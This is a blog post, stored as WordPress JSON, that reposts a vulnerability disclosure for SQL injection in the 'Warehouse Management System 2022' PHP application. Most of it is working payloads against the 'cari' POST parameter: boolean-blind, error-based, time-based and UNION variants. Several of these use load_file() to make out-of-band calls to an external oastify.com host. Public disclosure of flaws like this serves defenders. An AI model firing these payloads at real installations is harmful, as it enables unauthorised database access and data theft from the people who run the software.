{"id":25912,"date":"2022-06-19T22:20:02","date_gmt":"2022-06-19T18:20:02","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167479\/wms2022-sql.txt"},"modified":"2022-07-13T11:12:43","modified_gmt":"2022-07-13T06:42:43","slug":"warehouse-management-system-2022-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/warehouse-management-system-2022-sql-injection\/","title":{"rendered":"Warehouse Management System 2022 SQL Injection"},"content":{"rendered":"<p dir=\"ltr\">## Title: Warehouse Management System 2022 ML-SQLi<br \/>\n## Author: nu11secur1ty<br \/>\n## Date: 06.13.2022<br \/>\n## Vendor: https:\/\/www.sourcecodester.com\/users\/tips23<br \/>\n## Software: https:\/\/www.sourcecodester.com\/php-codeigniter-warehouse-management-system-free-source-code<br \/>\n## Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/oretnom23\/2022\/Warehouse-Management-System<\/p>\n<p dir=\"ltr\">## Description:<br \/>\nA Multiple SQLi exist in Warehouse Management System 2022 by oretnom23.<br \/>\nThe attacker can retrieve all information from this system by using<br \/>\nthis vulnerability.<\/p>\n<p dir=\"ltr\">Status: TURBO CRITICAL<\/p>\n<p dir=\"ltr\">[+] Payloads:<\/p>\n<p dir=\"ltr\">&#8220;`mysql<br \/>\n&#8212;<br \/>\nParameter: cari (POST)<br \/>\nType: boolean-based blind<br \/>\nTitle: OR boolean-based blind &#8211; WHERE or HAVING clause (NOT)<br \/>\nPayload: cari=(select<br \/>\nload_file(&#8216;\\\\\\\\f4klvq2zr2jjq1fqicjzdovoifo8c3hr8twljb70.oastify.com\\\\qxv&#8217;))<br \/>\nOR NOT 4744=4744# IltN&amp;kirim=<\/p>\n<p dir=\"ltr\">Type: error-based<br \/>\nTitle: MySQL &gt;= 5.0 OR error-based &#8211; WHERE, HAVING, ORDER BY or<br \/>\nGROUP BY clause (FLOOR)<br \/>\nPayload: cari=(select<br \/>\nload_file(&#8216;\\\\\\\\f4klvq2zr2jjq1fqicjzdovoifo8c3hr8twljb70.oastify.com\\\\qxv&#8217;))<br \/>\nOR (SELECT 9682 FROM(SELECT COUNT(*),CONCAT(0x71627a6a71,(SELECT<br \/>\n(ELT(9682=9682,1))),0x717a626a71,FLOOR(RAND(0)*2))x FROM<br \/>\nINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# mXqR&amp;kirim=<\/p>\n<p dir=\"ltr\">Type: time-based blind<br \/>\nTitle: MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)<br \/>\nPayload: cari=(select<br \/>\nload_file(&#8216;\\\\\\\\f4klvq2zr2jjq1fqicjzdovoifo8c3hr8twljb70.oastify.com\\\\qxv&#8217;))<br \/>\nAND (SELECT 7785 FROM (SELECT(SLEEP(5)))LDxo)# ZbKb&amp;kirim=<\/p>\n<p dir=\"ltr\">Type: UNION query<br \/>\nTitle: MySQL UNION query (NULL) &#8211; 9 columns<br \/>\nPayload: cari=-5568 UNION ALL SELECT<br \/>\nCONCAT(0x71627a6a71,0x4856564e4357704e696c6b4648505a656a744575445967544a494d5075566b5a4d466c7976516869,0x717a626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&amp;kirim=<br \/>\n&#8212;<\/p>\n<p dir=\"ltr\">&#8220;`<\/p>\n<p dir=\"ltr\">## Reproduce:<br \/>\n[href](https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/oretnom23\/2022\/Warehouse-Management-System)<\/p>\n<p dir=\"ltr\">## Proof and Exploit:<br \/>\n[href](https:\/\/streamable.com\/ef58wt)<\/p>\n","protected":false},"excerpt":{"rendered":"<p>## Title: Warehouse Management System 2022 ML-SQLi ## Author: nu11secur1ty ## Date: 06.13.2022 ## Vendor: https:\/\/www.sourcecodester.com\/users\/tips23 ## Software: https:\/\/www.sourcecodester.com\/php-codeigniter-warehouse-management-system-free-source-code ## Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/oretnom23\/2022\/Warehouse-Management-System ## Description: A Multiple SQLi exist in Warehouse Management System 2022 by oretnom23. The attacker can retrieve all information from this system by using this vulnerability. Status: TURBO CRITICAL [+] Payloads: &#8220;`mysql &#8212; &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-25912","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/25912","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=25912"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/25912\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=25912"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=25912"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=25912"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}